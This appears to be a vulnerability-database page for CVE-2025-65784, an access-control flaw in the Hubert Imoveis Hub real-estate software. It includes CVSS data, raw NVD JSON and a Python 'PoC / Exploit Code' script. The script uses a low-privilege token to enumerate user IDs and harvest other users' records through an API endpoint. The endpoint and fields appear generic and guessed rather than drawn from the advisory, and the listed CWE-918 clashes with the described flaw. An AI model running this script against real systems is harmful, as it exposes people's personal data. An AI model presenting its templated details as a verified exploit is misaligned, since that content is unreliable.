Security Vulnerability Report
中文
CVE-2025-65784 CVSS 6.5 MEDIUM

CVE-2025-65784

Published: 2026-01-13 17:15:59
Last Modified: 2026-02-13 20:54:21

Description

Insecure permissions in Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows authenticated attackers with low-level privileges to access other users' information via a crafted API request.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hubert:hub:2.0.1.27.3:*:*:*:*:*:*:* - VULNERABLE
Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65784 PoC - Insecure Permissions in Hubert Imoveis Hub # Target: Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 TARGET_URL = "http://target.com/api" ATTACKER_TOKEN = "attacker_session_token_here" def exploit_cve_2025_65784(): """ Exploit for CVE-2025-65784: Permission bypass to access other users' data This PoC demonstrates how a low-privilege user can access other users' information """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Step 1: Enumerate user IDs or use known user IDs for user_id in range(1, 100): # Step 2: Craft API request to access target user's data # The vulnerability allows bypassing permission checks payload = { "user_id": user_id, "action": "get_user_info" } # Step 3: Send crafted request response = requests.post( f"{TARGET_URL}/users/info", headers=headers, json=payload, timeout=10 ) if response.status_code == 200: data = response.json() if "user_data" in data: print(f"[!] Successfully accessed user {user_id} data") print(f"[+] Response: {json.dumps(data, indent=2)}") return data return None if __name__ == "__main__": print("CVE-2025-65784 Exploitation Script") print("Target: Hubert Imoveis Hub v2.0 1.27.3") exploit_cve_2025_65784()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65784", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:58.590", "lastModified": "2026-02-13T20:54:20.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure permissions in Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows authenticated attackers with low-level privileges to access other users' information via a crafted API request."}, {"lang": "es", "value": "Permisos inseguros en Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 permite a atacantes autenticados con privilegios de bajo nivel acceder a información de otros usuarios a través de una solicitud API manipulada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hubert:hub:2.0.1.27.3:*:*:*:*:*:*:*", "matchCriteriaId": "2BF9FBC6-E74F-46C8-9A21-800490E342B0"}]}]}], "references": [{"url": "http://hub.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://hubert.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/carlos-artmann/vulnerability-research/tree/main/CVE-2025-65784", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}